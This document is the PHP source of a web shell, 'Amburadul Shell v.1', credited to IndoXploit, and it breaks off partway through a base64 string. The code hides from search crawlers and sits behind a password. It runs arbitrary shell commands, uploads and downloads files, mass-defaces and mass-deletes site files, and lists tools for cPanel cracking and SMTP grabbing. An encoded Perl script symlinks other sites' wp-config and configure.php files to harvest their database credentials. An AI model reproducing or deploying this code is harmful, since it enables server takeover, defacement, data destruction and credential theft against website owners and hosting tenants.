Shel

1. <?php
2. $auth_pass = "6ac83452a304c33ec909612ac627fb34"; // default: Aso loe
3. session_start();
4. error_reporting(0);
5. set_time_limit(0);
6. @set_magic_quotes_runtime(0);
7. @clearstatcache();
8. @ini_set('error_log',NULL);
9. @ini_set('log_errors',0);
10. @ini_set('max_execution_time',0);
11. @ini_set('output_buffering',0);
12. @ini_set('display_errors', 0);
13.  
14.  
15. $color = "#00ff00";
16. $default_action = 'FilesMan';
17. $default_use_ajax = true;
18. $default_charset = 'UTF-8';
19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
22. header('HTTP/1.0 404 Not Found');
23. exit;
24. }
25. }
26.  
27. function login_shell() {
28. ?>
29. <html>
30. <body><body> <script> alert(' Login Dulu Ea ') </script></body>
31. <head>
32. <title>Google</title>
33. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
34. <style type="text/css">
35. body {
36. background-color: #000000;
37. background-image: url(https://imgur.com/XA3ykBI.jpg);
38. <!--https://imgur.com/XA3ykBI.jpg-->
39. margin-left: 0px;
40. margin-top: 0px;
41. margin-right: 0px;
42. margin-bottom: 0px;
43. background-position:right top;
44. background-repeat:no-repeat;
45. background-size:110%
46. }
47. html {
48. background:#387c6c;
49. -webkit-background-size: cover;
50. -moz-background-size: cover;
51. -o-background-size: cover;
52. background-size: cover;
53. }
54. html,body{margin:0;padding:0;height:100%;font:10px Arial;}
55. #wrapper{min-height:100%;position:relative;}
56. #header{background:#ff0000;padding:5px;height:50px;color:#3000ff;}
57. #body{padding-bottom:40px;padding-left:10px;}
58. #footer{background:#ff0000;position:absolute;bottom:0;width:100%;
59. text-align:center;color:#408080;}
60. header {
61. color: ;
62. margin: 10px auto;
63. }
64.  
65. </style>
66. </head>
67.  
68. <center>
69. <font face="monospace" size='3' color='cyan'><br>
70.  
71.  
72. <header>
73. <pre>
74. </pre>
75. </header>
76. <br><br><br><br><br><br><br><br>
77. <fieldset>
78. <label for="login">Username</label>
79. <form method="post">
80. <input type="text" name="id" value="Mr.4c1L Cr0tZz">
81. </form>
82. Password
83. <form method="post">
84. <input type="password" name="pass"> <br><br>
85. <input type="submit" value="Login">
86. </fieldset>
87. </form>
88. <style>
89. </style>
90. </head>
91. <body>
92.  
93. </font>
94. </body>
95. </head>
96. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
97. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
98. <tbody><tr>
99. <?php
100. exit;
101. }
102. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
103. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
104. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
105. else
106. login_shell();
107. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
108. @ob_clean();
109. $file = $_GET['file'];
110. header('Content-Description: File Transfer');
111. header('Content-Type: application/octet-stream');
112. header('Content-Disposition: attachment; filename="'.basename($file).'"');
113. header('Expires: 0');
114. header('Cache-Control: must-revalidate');
115. header('Pragma: public');
116. header('Content-Length: ' . filesize($file));
117. readfile($file);
118. exit;
119. }
120. ?>
121. <html>
122. <head>
123. <title>Amburadul Shell v.1</title>
124. <meta name='author' content='Recode IndoXploit'>
125. <meta charset="UTF-8">
126. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
127. <style type='text/css'>
128. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
129. html {
130. background: #2d4746;
131. color: #00ffe9;
132. font-family: 'Share Tech Mono';
133. font-size: 12px;
134. width: 100%;
135. }
136. li {
137. display: inline;
138. margin: 1px;
139. padding: 1px;
140. }
141.  
142. #menu{
143. background:#3b5653;
144. margin:9px 3px 4px 2px;
145. }
146. #menu a{
147. padding:4px 19px;
148. margin:0;
149. background:#365958;
150. text-decoration:none;
151. letter-spacing:2px;
152. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
153.  
154. }
155. #menu a:hover{
156. background:#3b5653;
157. border-bottom:1px solid #4a7a75;
158. border-top:1px solid #4a7a75;
159. }
160. .explore tr:hover{background:#3b5653}
161. table tr:first-child{
162. background: #619996;
163. text-align: center;
164. color: white;
165. }
166. table, th, td {
167. border-collapse:collapse;
168. font-family: Tahoma, Geneva, sans-serif;
169. background: transparent;
170. font-family: 'Share Tech Mono';
171. font-size: 13px;
172. }
173. .table_home, .th_home, .td_home {
174. border: 1px solid #619996;
175. }
176. th {
177. padding: 10px;
178. }
179. a {
180. color: #00ffe9;
181. text-decoration: none;
182. }
183. a:hover {
184. color: red;
185. text-decoration: underline;
186. }
187. b {
188. color: white;
189. }
190. input[type=text], input[type=password],input[type=submit] {
191. background: transparent;
192. color: #00ffe9;
193. border: 1px solid #00ffe9;
194. margin: 5px auto;
195. padding-left: 5px;
196. font-family: 'Share Tech Mono';
197. font-size: 13px;
198. }
199. input[type=submit] {
200. background: #619996;
201. color: #00ffe9;
202. border: 1px solid #00ffe9;
203. margin: 5px auto;
204. padding-left: 5px;
205. font-family: 'Share Tech Mono';
206. font-size: 13px;
207. cursor:pointer;
208. }
209. textarea {
210. border: 1px solid #00ffe9;
211. width: 100%;
212. height: 400px;
213. padding-left: 5px;
214. margin: 10px auto;
215. resize: none;
216. background: transparent;
217. color: #ffffff;
218. font-family: 'Share Tech Mono';
219. font-size: 13px;
220. }
221. select {
222. width: 152px;
223. background: #435651;
224. color: white;
225. border: 1px solid #00ffe9;
226. margin: 5px auto;
227. padding-left: 5px;
228. font-family: 'Share Tech Mono';
229. font-size: 13px;
230. }
231. option:hover {
232. background: white;
233. color: #435651;
234. }
235. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
236. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
237. .infoweb {
238. border-right: 1px solid #00FFFF;
239. }
240. </style>
241. </head>
242. <?php
243. ###############################################################################
244. // Mngganti Copyright tidak akan menjadikan anda sebagai programer
245. ###############################################################################
246. function w($dir,$perm) {
247. if(!is_writable($dir)) {
248. return "<font color=red>".$perm."</font>";
249. } else {
250. return "<font color=white>".$perm."</font>";
251. }
252. }
253. function r($dir,$perm) {
254. if(!is_readable($dir)) {
255. return "<font color=red>".$perm."</font>";
256. } else {
257. return "<font color=white>".$perm."</font>";
258. }
259. }
260. function exe($cmd) {
261. if(function_exists('system')) {
262. @ob_start();
263. @system($cmd);
264. $buff = @ob_get_contents();
265. @ob_end_clean();
266. return $buff;
267. } elseif(function_exists('exec')) {
268. @exec($cmd,$results);
269. $buff = "";
270. foreach($results as $result) {
271. $buff .= $result;
272. } return $buff;
273. } elseif(function_exists('passthru')) {
274. @ob_start();
275. @passthru($cmd);
276. $buff = @ob_get_contents();
277. @ob_end_clean();
278. return $buff;
279. } elseif(function_exists('shell_exec')) {
280. $buff = @shell_exec($cmd);
281. return $buff;
282. }
283. }
284. function perms($file){
285. $perms = fileperms($file);
286. if (($perms & 0xC000) == 0xC000) {
287. // Socket
288. $info = 's';
289. } elseif (($perms & 0xA000) == 0xA000) {
290. // Symbolic Link
291. $info = 'l';
292. } elseif (($perms & 0x8000) == 0x8000) {
293. // Regular
294. $info = '-';
295. } elseif (($perms & 0x6000) == 0x6000) {
296. // Block special
297. $info = 'b';
298. } elseif (($perms & 0x4000) == 0x4000) {
299. // Directory
300. $info = 'd';
301. } elseif (($perms & 0x2000) == 0x2000) {
302. // Character special
303. $info = 'c';
304. } elseif (($perms & 0x1000) == 0x1000) {
305. // FIFO pipe
306. $info = 'p';
307. } else {
308. // Unknown
309. $info = 'u';
310. }
311. // Owner
312. $info .= (($perms & 0x0100) ? 'r' : '-');
313. $info .= (($perms & 0x0080) ? 'w' : '-');
314. $info .= (($perms & 0x0040) ?
315. (($perms & 0x0800) ? 's' : 'x' ) :
316. (($perms & 0x0800) ? 'S' : '-'));
317. // Group
318. $info .= (($perms & 0x0020) ? 'r' : '-');
319. $info .= (($perms & 0x0010) ? 'w' : '-');
320. $info .= (($perms & 0x0008) ?
321. (($perms & 0x0400) ? 's' : 'x' ) :
322. (($perms & 0x0400) ? 'S' : '-'));
323. // World
324. $info .= (($perms & 0x0004) ? 'r' : '-');
325. $info .= (($perms & 0x0002) ? 'w' : '-');
326. $info .= (($perms & 0x0001) ?
327. (($perms & 0x0200) ? 't' : 'x' ) :
328. (($perms & 0x0200) ? 'T' : '-'));
329. return $info;
330. }
331. function hdd($s) {
332. if($s >= 1073741824)
333. return sprintf('%1.2f',$s / 1073741824 ).' GB';
334. elseif($s >= 1048576)
335. return sprintf('%1.2f',$s / 1048576 ) .' MB';
336. elseif($s >= 1024)
337. return sprintf('%1.2f',$s / 1024 ) .' KB';
338. else
339. return $s .' B';
340. }
341. function ambilKata($param, $kata1, $kata2){
342. if(strpos($param, $kata1) === FALSE) return FALSE;
343. if(strpos($param, $kata2) === FALSE) return FALSE;
344. $start = strpos($param, $kata1) + strlen($kata1);
345. $end = strpos($param, $kata2, $start);
346. $return = substr($param, $start, $end - $start);
347. return $return;
348. }
349. function getsource($url) {
350. $curl = curl_init($url);
351. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
352. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
353. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
354. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
355. $content = curl_exec($curl);
356. curl_close($curl);
357. return $content;
358. }
359. function bing($dork) {
360. $npage = 1;
361. $npages = 30000;
362. $allLinks = array();
363. $lll = array();
364. while($npage <= $npages) {
365. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
366. if($x) {
367. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
368. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
369. $npage = $npage + 10;
370. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
371. } else break;
372. }
373. $URLs = array();
374. foreach($allLinks as $url){
375. $exp = explode("/", $url);
376. $URLs[] = $exp[2];
377. }
378. $array = array_filter($URLs);
379. $array = array_unique($array);
380. $sss = count(array_unique($array));
381. foreach($array as $domain) {
382. echo $domain."\n";
383. }
384. }
385. function reverse($url) {
386. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
387. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
388. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
389. curl_setopt($ch, CURLOPT_HEADER, 0);
390. curl_setopt($ch, CURLOPT_POST, 1);
391. $resp = curl_exec($ch);
392. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
393. $array = explode(",,", $resp);
394. unset($array[0]);
395. foreach($array as $lnk) {
396. $lnk = "http://$lnk";
397. $lnk = str_replace(",", "", $lnk);
398. echo $lnk."\n";
399. ob_flush();
400. flush();
401. }
402. curl_close($ch);
403. }
404. if(get_magic_quotes_gpc()) {
405. function idx_ss($array) {
406. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
407. }
408. $_POST = idx_ss($_POST);
409. $_COOKIE = idx_ss($_COOKIE);
410. }
411.  
412. if(isset($_GET['dir'])) {
413. $dir = $_GET['dir'];
414. chdir($dir);
415. } else {
416. $dir = getcwd();
417. }
418. $kernel = php_uname();
419. $ip = gethostbyname($_SERVER['HTTP_HOST']);
420. $dir = str_replace("\\","/",$dir);
421. $scdir = explode("/", $dir);
422. $freespace = hdd(disk_free_space("/"));
423. $total = hdd(disk_total_space("/"));
424. $used = $total - $freespace;
425. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=white>OFF</font>";
426. $ds = @ini_get("disable_functions");
427. $mysql = (function_exists('mysql_connect')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
428. $curl = (function_exists('curl_version')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
429. $wget = (exe('wget --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
430. $perl = (exe('perl --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
431. $python = (exe('python --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
432. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>NONE</font>";
433. if(!function_exists('posix_getegid')) {
434. $user = @get_current_user();
435. $uid = @getmyuid();
436. $gid = @getmygid();
437. $group = "?";
438. } else {
439. $uid = @posix_getpwuid(posix_geteuid());
440. $gid = @posix_getgrgid(posix_getegid());
441. $user = $uid['name'];
442. $uid = $uid['uid'];
443. $group = $gid['name'];
444. $gid = $gid['gid'];
445. }
446. echo "System: <font color=white>".$kernel."</font><br>";
447. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
448. echo "Server IP: <font color=white>".$ip."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
449. echo "HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )<br>";
450. echo "Safe Mode: $sm<br>";
451. echo "Disable Functions: $show_ds<br>";
452. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
453. echo "Current DIR: ";
454. foreach($scdir as $c_dir => $cdir) {
455. echo "<a href='?dir=";
456. for($i = 0; $i <= $c_dir; $i++) {
457. echo $scdir[$i];
458. if($i != $c_dir) {
459. echo "/";
460. }
461. }
462. echo "'>$cdir</a>/";
463. }
464.  
465. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
466. echo "<hr>";
467. echo "<center>";
468. echo "<ul>";
469. echo "<center><font size='6px' color='white'>Amburadul Shell v.1</font>";
470. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=red>IndoXploit</font></a></center>";
471. echo "<br>";
472. echo "<br>";
473. echo "<li>[ <a href='?'>Home</a> ]</li>";
474. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
475. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
476. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
477. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
478. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
479. echo "<br><br><li>[ <a href='?dir=$dir&do=jumping'>Lompat Indah</a> ]</li>";
480. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]</li>";
481. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
482. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
483. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
484. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
485. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
486. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
487. echo "<br><li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
488. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
489. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
490. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Eue</a> ]</li>";
491. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Eue V.2</a> ]</li>";
492. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
493. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
494. echo "<li>[ <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> ]</li>";
495. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
496. echo "</ul>";
497. echo "</center>";
498. echo "<hr>";
499. if($_GET['logout'] == true) {
500. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
501. echo "<script>window.location='?';</script>";
502. } elseif($_GET['do'] == 'upload') {
503. echo "<center>";
504. if($_POST['upload']) {
505. if($_POST['tipe_upload'] == 'biasa') {
506. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
507. $act = "<font color=white>Terupload bossque!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
508. } else {
509. $act = "<font color=red>failed to upload file boss</font>";
510. }
511. } else {
512. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
513. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
514. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
515. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
516. $act = "<font color=white>Terupload Boss!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
517. } else {
518. $act = "<font color=red>failed to upload file boss</font>";
519. }
520. } else {
521. $act = "<font color=red>failed to upload file boss</font>";
522. }
523. }
524. }
525. echo "Upload File:
526. <form method='post' enctype='multipart/form-data'>
527. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
528. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
529. <input type='file' name='ix_file'>
530. <input type='submit' value='upload' name='upload'>
531. </form>";
532. echo $act;
533. echo "</center>";
534. } elseif($_GET['do'] == 'cmd') {
535. echo "<form method='post'>
536. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
537. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
538. </form>";
539. if($_POST['do_cmd']) {
540. echo "<pre>".exe($_POST['cmd'])."</pre>";
541. }
542. } elseif($_GET['do'] == 'mass_deface') {
543. function sabun_massal($dir,$namafile,$isi_script) {
544. if(is_writable($dir)) {
545. $dira = scandir($dir);
546. foreach($dira as $dirb) {
547. $dirc = "$dir/$dirb";
548. $lokasi = $dirc.'/'.$namafile;
549. if($dirb === '.') {
550. file_put_contents($lokasi, $isi_script);
551. } elseif($dirb === '..') {
552. file_put_contents($lokasi, $isi_script);
553. } else {
554. if(is_dir($dirc)) {
555. if(is_writable($dirc)) {
556. echo "[<font color=white>DONE</font>] $lokasi<br>";
557. file_put_contents($lokasi, $isi_script);
558. $idx = sabun_massal($dirc,$namafile,$isi_script);
559. }
560. }
561. }
562. }
563. }
564. }
565. function sabun_biasa($dir,$namafile,$isi_script) {
566. if(is_writable($dir)) {
567. $dira = scandir($dir);
568. foreach($dira as $dirb) {
569. $dirc = "$dir/$dirb";
570. $lokasi = $dirc.'/'.$namafile;
571. if($dirb === '.') {
572. file_put_contents($lokasi, $isi_script);
573. } elseif($dirb === '..') {
574. file_put_contents($lokasi, $isi_script);
575. } else {
576. if(is_dir($dirc)) {
577. if(is_writable($dirc)) {
578. echo "[<font color=white>DONE</font>] $dirb/$namafile<br>";
579. file_put_contents($lokasi, $isi_script);
580. }
581. }
582. }
583. }
584. }
585. }
586. if($_POST['start']) {
587. if($_POST['tipe_sabun'] == 'mahal') {
588. echo "<div style='margin: 5px auto; padding: 5px'>";
589. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
590. echo "</div>";
591. } elseif($_POST['tipe_sabun'] == 'murah') {
592. echo "<div style='margin: 5px auto; padding: 5px'>";
593. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
594. echo "</div>";
595. }
596. } else {
597. echo "<center>";
598. echo "<form method='post'>
599. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
600. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
601. <font style='text-decoration: underline;'>Folder:</font><br>
602. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
603. <font style='text-decoration: underline;'>Filename:</font><br>
604. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
605. <font style='text-decoration: underline;'>Index File:</font><br>
606. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Mr.4c1L Cr0tZz</textarea><br>
607. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
608. </form></center>";
609. }
610. } elseif($_GET['do'] == 'mass_delete') {
611. function hapus_massal($dir,$namafile) {
612. if(is_writable($dir)) {
613. $dira = scandir($dir);
614. foreach($dira as $dirb) {
615. $dirc = "$dir/$dirb";
616. $lokasi = $dirc.'/'.$namafile;
617. if($dirb === '.') {
618. if(file_exists("$dir/$namafile")) {
619. unlink("$dir/$namafile");
620. }
621. } elseif($dirb === '..') {
622. if(file_exists("".dirname($dir)."/$namafile")) {
623. unlink("".dirname($dir)."/$namafile");
624. }
625. } else {
626. if(is_dir($dirc)) {
627. if(is_writable($dirc)) {
628. if(file_exists($lokasi)) {
629. echo "[<font color=white>DELETED</font>] $lokasi<br>";
630. unlink($lokasi);
631. $idx = hapus_massal($dirc,$namafile);
632. }
633. }
634. }
635. }
636. }
637. }
638. }
639. if($_POST['start']) {
640. echo "<div style='margin: 5px auto; padding: 5px'>";
641. hapus_massal($_POST['d_dir'], $_POST['d_file']);
642. echo "</div>";
643. } else {
644. echo "<center>";
645. echo "<form method='post'>
646. <font style='text-decoration: underline;'>Folder:</font><br>
647. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
648. <font style='text-decoration: underline;'>Filename:</font><br>
649. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
650. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
651. </form></center>";
652. }
653. } elseif($_GET['do'] == 'config') {
654. $idx = mkdir("Cr0tz_config", 0777);
655. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
656. $htc = fopen("Cr0tz_config/.htaccess","w");
657. fwrite($htc, $isi_htc);
658. fclose($htc);
659. if(preg_match("/vhosts|vhost/", $dir)) {
660. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
661. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNp